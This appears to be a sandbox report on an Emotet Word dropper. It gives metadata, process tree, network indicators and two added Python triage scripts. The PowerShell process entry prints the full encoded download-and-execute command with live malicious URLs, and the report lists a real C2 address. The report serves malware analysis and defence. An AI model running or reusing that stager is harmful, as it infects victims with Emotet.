File name: GB_03786017313_1014.doc
Full analysis: https://app.any.run/tasks/c7997970-02f9-4632-b3c0-aea7c1c178c6
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded repeatedly into a highly destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: October 14, 2019, 14:50:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Spring, Subject: Legacy, Author: Janice Terry, Keywords: PCI, Comments: seamless, Template: Normal.dotm, Last Saved By: Bridgette Krajcik, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 07:34:00 2019, Last Saved Time/Date: Mon Oct 14 07:34:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 175, Security: 0
MD5: B2AA7083B0D4DB137A550B75DEBBC900
SHA1: BDEC7CC4465DB0C83BFF0630EB2DC5FD93BB9F8F
SHA256: E3456221E5332E6179FCCB616E43AAE746A7754F8B2648722C6650CB0CF51E44
SSDEEP: 6144:oHz1HaeCuKUzSdWnLx3c5F1TpJWsWO/g2aJFCHosE9:oHz1HaeCzUGdWt30F/g2cEBe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process: 743.exe (PID 2480), msptermsizes.exe (PID 3832), msptermsizes.exe (PID 1036), 743.exe (PID 3300)
    • Emotet process was detected: 743.exe (PID 2480)
    • Downloads executable files from the Internet: powershell.exe (PID 3132)
    • Connects to CnC server: msptermsizes.exe (PID 3832)
    • EMOTET was detected: msptermsizes.exe (PID 3832)
  • SUSPICIOUS
    • Executable content was dropped or overwritten: 743.exe (PID 2480), powershell.exe (PID 3132)
    • Starts itself from another location: 743.exe (PID 2480)
    • Application launched itself: 743.exe (PID 3300)
    • Creates files in the user directory: powershell.exe (PID 3132)
    • Executed via WMI: powershell.exe (PID 3132)
    • PowerShell script executed: powershell.exe (PID 3132)
  • INFO
    • Reads Microsoft Office registry keys: WINWORD.EXE (PID 2260)
    • Creates files in the user directory: WINWORD.EXE (PID 2260)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Paucek
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 204
Paragraphs: 1
Lines: 1
Company: VonRueden - Dickinson
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 175
Words: 30
Pages: 1
ModifyDate: 2019:10:14 06:34:00
CreateDate: 2019:10:14 06:34:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Bridgette Krajcik
Template: Normal.dotm
Comments: seamless
Keywords: PCI
Author: Janice Terry
Subject: Legacy
Title: Spring
Total processes: 43
Monitored processes: 6
Malicious processes: 5
Suspicious processes: 0

Behavior graph (process tree; "no specs" marks processes that triggered no signatures)

explorer.exe
  └─ start → winword.exe (PID 2260, no specs)
wmiprvse.exe
  └─ start → powershell.exe (PID 3132)
      └─ drop and start → 743.exe (PID 3300, no specs)
          └─ start → 743.exe (PID 2480) #EMOTET
              └─ drop and start → msptermsizes.exe (PID 1036, no specs)
                  └─ start → msptermsizes.exe (PID 3832) #EMOTET

Process information

PID 2260 | WINWORD.EXE | parent: explorer.exe
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\GB_03786017313_1014.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM | Description: Microsoft Word | Version: 14.0.6024.1000

PID 3132 | powershell.exe | parent: wmiprvse.exe
CMD: powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABmADYAMAA5ADYAOABkADYAOQBkAD0AJwBhADAAeAA1AGIANABhADIANABhAGYANQA1ACcAOwAkAGEAMAB4ADUAMwBmAGUANgA1ADMAYgBmAGQAMQBhAGIANgA2ACAAPQAgACcANwA0ADMAJwA7ACQAYQAwAHgAMAAxADAAYgBiAGYAYwBiADkANwA1ADkAPQAnAGEAMAB4ADkAZgA5AGUANgA1AGIAZgA3AGMAMwBlAGIAYgAnADsAJABhADAAeAA4AGUAMQAxAGUAYQBkADcAMQBkADQANwBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADAAeAA1ADMAZgBlADYANQAzAGIAZgBkADEAYQBiADYANgArACcALgBlAHgAZQAnADsAJABhADAAeAAzAGUANgA5ADcAYgA1AGUAMgA5AD0AJwBhADAAeAAxAGMANQA4AGIAMwA2ADYAYgA0AGIAZAAxACcAOwAkAGEAMAB4AGQANAAzADkANwAxADMANgBlADQAMQAxADMAZgA2AD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAVAAuAFcAZQBCAEMATABJAGUATgBUADsAJABhADAAeAAyAGUAZAA2AGIANgBlADEAYgA4ADUAMQA9ACcAaAB0AHQAcAA6AC8ALwBzAGcAbgByAC4AaQBuAC8AZABpAGUAdABpAHQAaQBhAG4AcwBhAGsAcwBoAGkALwBhADQAZABlAG4AbwAzAHcALQA3AGsAZQA3AHkAMgAtADcAMAA2ADMANwAwADQAMQAyAC8AKgBoAHQAdABwADoALwAvAHAAZQBkAHIAbwBvAHQAYQB2AGkAbwAuAHQAbwBwAC8AYwBnAGkALQBiAGkAbgAvADkAaQBhAGwAZQAtAGMAYQA2AGQAdAByADYAZwBrAC0ANQA2ADEANQAxADcANgAyAC8AKgBoAHQAdABwAHMAOgAvAC8AagAtAGMAdABhAC4AbwByAGcALwB3AHAALQBhAGQAbQBpAG4ALwBMAGcAYgBvAFkASQBtAC8AKgBoAHQAdABwAHMAOgAvAC8AdABoAGUAaABvAG0AZQBiAGUAbgBlAGYAaQB0AHAAcgBvAGcAcgBhAG0ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEgAcgBjAGkAQwBOAC8AKgBoAHQAdABwAHMAOgAvAC8AYQBkAGEAbgB6AHkAZQB5AGEAcABpAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA0AHYAMABwAC0AdAAxAGUANgBzADYAbQA2AC0AMAA5ADgALwAnAC4AIgBTAFAATABgAGkAdAAiACgAJwAqACcAKQA7ACQAYQAwAHgAYwAzADEAMABlADMANwAzAGYAZQBkAD0AJwBhADAAeABjAGMAYQAwAGQAYgA3AGEAMgA3ACcAOwBmAG8AcgBlAGEAYwBoACgAJABhADAAeAAyAGEAZABiAGIAZABmADEAMwAxAGYANQA0ADgAIABpAG4AIAAkAGEAMAB4ADIAZQBkADYAYgA2AGUAMQBiADgANQAxACkAewB0AHIAeQB7ACQAYQAwAHgAZAA0ADMAOQA3ADEAMwA2AGUANAAxADEAMwBmADYALgAiAEQATwBXAG4AYABMAG8AQQBgAEQAYABGAGkATABlACIAKAAkAGEAMAB4ADIAYQBkAGIAYgBkAGYAMQAzADEAZgA1ADQAOAAsACAAJABhADAAeAA4AGUAMQAxAGUAYQBkADcAMQBkADQANwBiACkAOwAkAGEAMAB4AGUAZgAyADgANwA3ADIAMQA1ADUANQA5AGEAPQAnAGEAMAB4AGQANQBiADUAOABjADAANwBmADMAMQAzAGUAZABkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAYQAwAHgAOABlADEAMQBlAGEAZAA3ADEAZAA0ADcAYgApAC4AIgBMAEUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA4ADUANwA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAGEAMAB4ADgAZQAxADEAZQBhAGQANwAxAGQANAA3AGIAKQA7ACQAYQAwAHgAYwBiADAANAA0AGEAOAA3AGIANwA1ADcAPQAnAGEAMAB4ADUAYQAyADkANAA3ADIAYwA4AGQANwAzADUANgAnADsAYgByAGUAYQBrADsAJABhADAAeAA0ADgAYQA5AGMAZgAzADQAOABiADMAZQA9ACcAYQAwAHgAYgAwADgAMgBiADkAYwAzADgAMgBhADAAMwAyACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEAMAB4ADQAMgAzADgAMwBjAGMAZAAzADYANwBkADAAOQA9ACcAYQAwAHgAZgAyADIANwBhADIAYQBhADYAMABmADgAZgBjAGIAJwA=
(The -e switch is -EncodedCommand: the argument is the base64 encoding of the script as UTF-16LE text, so it decodes directly with no key. The GET to sgnr.in and the appearance of C:\Users\admin\743.exe below are this script's work.)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM | Description: Windows PowerShell | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3300 | 743.exe | parent: powershell.exe
CMD: "C:\Users\admin\743.exe"
Path: C:\Users\admin\743.exe
User: admin | Integrity level: MEDIUM | Description: DirectoryBrowse MFC Application | Exit code: 0 | Version: 1, 0, 0, 1

PID 2480 | 743.exe | parent: 743.exe
CMD: --a90d1734
Path: C:\Users\admin\743.exe
User: admin | Integrity level: MEDIUM | Description: DirectoryBrowse MFC Application | Exit code: 0 | Version: 1, 0, 0, 1

PID 1036 | msptermsizes.exe | parent: 743.exe
CMD: "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"
Path: C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
User: admin | Integrity level: MEDIUM | Description: DirectoryBrowse MFC Application | Exit code: 0 | Version: 1, 0, 0, 1

PID 3832 | msptermsizes.exe | parent: msptermsizes.exe
CMD: --f91b2738
Path: C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
User: admin | Integrity level: MEDIUM | Description: DirectoryBrowse MFC Application | Version: 1, 0, 0, 1
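The encoded command of PID 3132 is the first thing to unpack when triaging a report like this: it carries the full stage-1 URL list (the network section shows only the one URL that answered) and the drop path. The decoder below is an added example written for this page, not ANY.RUN's code. SAMPLE_SCRIPT is constructed here in the shape of the decoded command (a decoy `<# #>` comment, a single `'*'`-separated URL string, backtick-split member names, `WebClient.DownloadFile` into `$env:userprofile`, a size check, `Process.Start`); its URLs, variable names and the size threshold are placeholders, not values from the report.

```python
"""Decode a `powershell -e <base64>` command line and pull out the stage-1
URL list, the local drop path, and whether the script downloads and runs a file.

Added example, not ANY.RUN's code. SAMPLE_SCRIPT below is constructed:
its URLs, variable names and size threshold are placeholders.
"""
import base64
import re

ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)
URL = re.compile(r"https?://[^\s'\"*]+")
STR_ASSIGN = re.compile(r"\$([A-Za-z0-9_]+)\s*=\s*'([^']*)'")
# $env:userprofile+'\'+$var+'.exe'  (any chain of literals and variables)
PROFILE_CONCAT = re.compile(r"\$env:userprofile(?:\s*\+\s*(?:'[^']*'|\$[A-Za-z0-9_]+))+", re.I)
PROCESS_START = re.compile(r"process\]::\"?start\"?", re.I)


def decode_encoded_command(cmdline):
    """-EncodedCommand is base64 of the script as UTF-16LE text; no key involved."""
    m = ENC_ARG.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument on the command line")
    return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")


def resolve_concat(expr, variables):
    """Evaluate a chain like $env:userprofile+'\\'+$x+'.exe' using the
    single-quoted string assignments collected from the script."""
    parts = []
    for tok in re.split(r"\s*\+\s*", expr.strip()):
        if tok.startswith("'"):
            parts.append(tok.strip("'"))
        elif tok.lower() == "$env:userprofile":
            parts.append("%USERPROFILE%")
        else:
            parts.append(variables.get(tok.lstrip("$"), tok))
    return "".join(parts)


def extract_iocs(script):
    # Backticks inside member names are no-ops to PowerShell: "DOWn`LoA`D`FiLe" is DownloadFile.
    plain = script.replace("`", "")
    decoy = BLOCK_COMMENT.findall(plain)          # benign-looking URLs in comments are not IOCs
    body = BLOCK_COMMENT.sub("", plain)
    variables = dict(STR_ASSIGN.findall(body))
    drop = PROFILE_CONCAT.search(body)
    return {
        "decoy_urls": [u for c in decoy for u in URL.findall(c)],
        "urls": URL.findall(body),
        "drop_path": resolve_concat(drop.group(0), variables) if drop else None,
        "downloads_file": "downloadfile" in body.lower(),
        "starts_process": bool(PROCESS_START.search(body)),
    }


# Constructed sample in the shape of the report's script (placeholder URLs and names).
SAMPLE_SCRIPT = (
    "<# https://www.microsoft.com/ #> "
    "$a0x5b4a='743';"
    "$a0x8e11=$env:userprofile+'\\'+$a0x5b4a+'.exe';"
    "$a0xd439=&('new-ob'+'j'+'ect') nET.WeBCLIeNT;"
    "$a0x2ed6='http://stage1.example/a/*https://stage2.example/b/*http://stage3.example/c/'.\"SPL`it\"('*');"
    "foreach($u in $a0x2ed6){try{$a0xd439.\"DOWn`LoA`D`FiLe\"($u, $a0x8e11);"
    "If ((.('Get-I'+'tem') $a0x8e11).\"LE`NG`Th\" -ge 1024) "
    "{[Diagnostics.Process]::\"s`TART\"($a0x8e11);break;}}catch{}}"
)
SAMPLE_CMDLINE = "powershell -e " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    print(extract_iocs(decode_encoded_command(SAMPLE_CMDLINE)))
```

To use it on this report, pass the whole `powershell -e …` line from the process table to `decode_encoded_command` and feed the result to `extract_iocs`. The loop structure matters for blocking: every URL in the list is a live stage-1 candidate until the first one serves a file above the size threshold, so the ones that did not answer in the sandbox still belong on the blocklist.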
Total events: 2 531
Read events: 1 674
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 2
Suspicious files: 2
Text files: 2
Unknown types: 16

Dropped files

PID 2260 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB6B8.tmp | type: cvr
MD5: - | SHA256: -

PID 3132 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XI67XO23KZT4SPZKX756.temp | type: -
MD5: - | SHA256: -

PID 2260 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\GB_03786017313_1014.doc.LNK | type: lnk
MD5: 15108FE0F4904F04BF0E15B28C65CFFD | SHA256: 5EB1D0245949D1326E4FF72D02B4C2E39ED19192EF0A35FB1BF67B2BCE2FC2CE

PID 2260 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3904AC2.wmf | type: wmf
MD5: D12A4C9DB6739CF8C14BE166A203FD4B | SHA256: 46B388FE7CCC05F5567B37052FDD89E01608623F6204A8F91EDB202D3F886C50

PID 2260 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDA87820.wmf | type: wmf
MD5: 09B63D8340934094A148E3ACD838F2DF | SHA256: 2CC37315F94EACAABF17C6213BB9775D818A4DB5C254ABA16D4339C125EFEB9F

PID 2260 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81ACA716.wmf | type: wmf
MD5: DA98CE5B21D5A480AC46729CA91BE056 | SHA256: E7B8398B7E35B7D51CEFB33A755F831B6821284E301FCBA42F12E5382CAF9A86

PID 2260 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | type: tlb
MD5: A1A2D874F2212CB6A496BDA6AF19F873 | SHA256: 483A27E3D391F3B3717AF8920D13A9D09A16E6B69BC86973225F2945D7CFFC4B

PID 2260 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E67C332E.wmf | type: wmf
MD5: A780DC91E3F0CA377281E9A75A852F2F | SHA256: E99D69F0F77F03A6745EE2C2100908180AD656657FDFA703DD7B38ACA3D6F048

PID 2260 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E8BB76C.wmf | type: wmf
MD5: 5D617C6A4A087A3B01771C0EB9B1A9E0 | SHA256: 556E24E818448E5FE6B9C47929863EEDA8EAFF4CCD241C4EA9F9210E931D7FBF

PID 2260 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DEF9B94.wmf | type: wmf
MD5: 6CB3B37671576CD20DC3945491B4447E | SHA256: 0EC43CFDAA7DE6670D7D2B9ACF7115ABAFB11C8FA12AB95A068715E2F5E46A98
HTTP(S) requests: 2
TCP/UDP connections: 2
DNS requests: 1
Threats: 0

HTTP requests

PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation
3832 | msptermsizes.exe | POST | - | 190.117.206.153:443 | http://190.117.206.153:443/attrib/ | PE | - | - | malicious
3132 | powershell.exe | GET | 200 | 13.234.168.135:80 | http://sgnr.in/dietitiansakshi/a4deno3w-7ke7y2-706370412/ | IN | executable | 540 Kb | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3132 | powershell.exe | 13.234.168.135:80 | sgnr.in | Amazon.com, Inc. | IN | suspicious
3832 | msptermsizes.exe | 190.117.206.153:443 | - | America Movil Peru S.A.C. | PE | malicious

DNS requests

Domain | IP | Reputation
sgnr.in | 13.234.168.135 | suspicious

Threats

PID | Process | Class | Message
3132 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3132 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3132 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
3832 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 11
3832 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3832 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3832 | msptermsizes.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
2 ETPRO signatures available at the full report
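Two of the signatures above need no reputation feed at all: "ET POLICY HTTP traffic on port 443 (POST)" is a protocol/port mismatch, and "Executable Retrieved With Minimal HTTP Headers" is a PE body arriving at a non-browser process. The check below is an added example written for this page, not ANY.RUN's or Emerging Threats' code. SAMPLE_HTTP is constructed from the HTTP-requests table of this report; the response bytes and header counts are made up here because the report does not show them, and the "minimal headers" threshold of 4 is an assumption.

```python
"""Protocol-level triage of HTTP records: plain HTTP on 443, POST to an IP
literal, and a PE body fetched by a non-browser process.

Added example, not ANY.RUN's code. SAMPLE_HTTP is constructed from the
report's HTTP table; response bytes and header counts are invented here.
"""
import ipaddress
from urllib.parse import urlsplit

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
MINIMAL_HEADER_COUNT = 4   # assumed threshold for "minimal HTTP headers"


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(records):
    """Return (pid, finding) pairs for every record that trips a check."""
    findings = []
    for r in records:
        u = urlsplit(r["url"])
        port = u.port or (443 if u.scheme == "https" else 80)
        proc = r["process"].lower()
        # Plain HTTP on the TLS port: the C2 check-in is not encrypted, only parked on 443.
        if u.scheme == "http" and port == 443:
            findings.append((r["pid"], "plaintext_http_on_443"))
        # POST straight to an IP literal: no DNS lookup precedes the check-in,
        # which is why the DNS table of this report lists only sgnr.in.
        if r["method"] == "POST" and _is_ip_literal(u.hostname or ""):
            findings.append((r["pid"], "post_to_ip_literal"))
        # A PE (MZ header) downloaded by something that is not a browser.
        body = r.get("response_head", b"")
        if r["method"] == "GET" and body[:2] == b"MZ" and proc not in BROWSERS:
            findings.append((r["pid"], "pe_download_by_non_browser"))
            if r.get("response_header_count", 99) <= MINIMAL_HEADER_COUNT:
                findings.append((r["pid"], "pe_served_with_minimal_headers"))
    return findings


# Constructed from the report's HTTP table; response_head and response_header_count are invented.
SAMPLE_HTTP = [
    {"pid": 3132, "process": "powershell.exe", "method": "GET", "status": 200,
     "url": "http://sgnr.in/dietitiansakshi/a4deno3w-7ke7y2-706370412/",
     "response_head": b"MZ\x90\x00\x03\x00\x00\x00", "response_header_count": 3},
    {"pid": 3832, "process": "msptermsizes.exe", "method": "POST", "status": None,
     "url": "http://190.117.206.153:443/attrib/",
     "response_head": b"", "response_header_count": 0},
]

if __name__ == "__main__":
    for pid, finding in triage(SAMPLE_HTTP):
        print(pid, finding)
```

The download from sgnr.in is flagged twice (PE body, minimal headers) and the check-in twice (plaintext on 443, POST to a bare IP); neither finding depends on the Feodo Tracker listing, so the same logic keeps working after the C2 address rotates.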
No debug info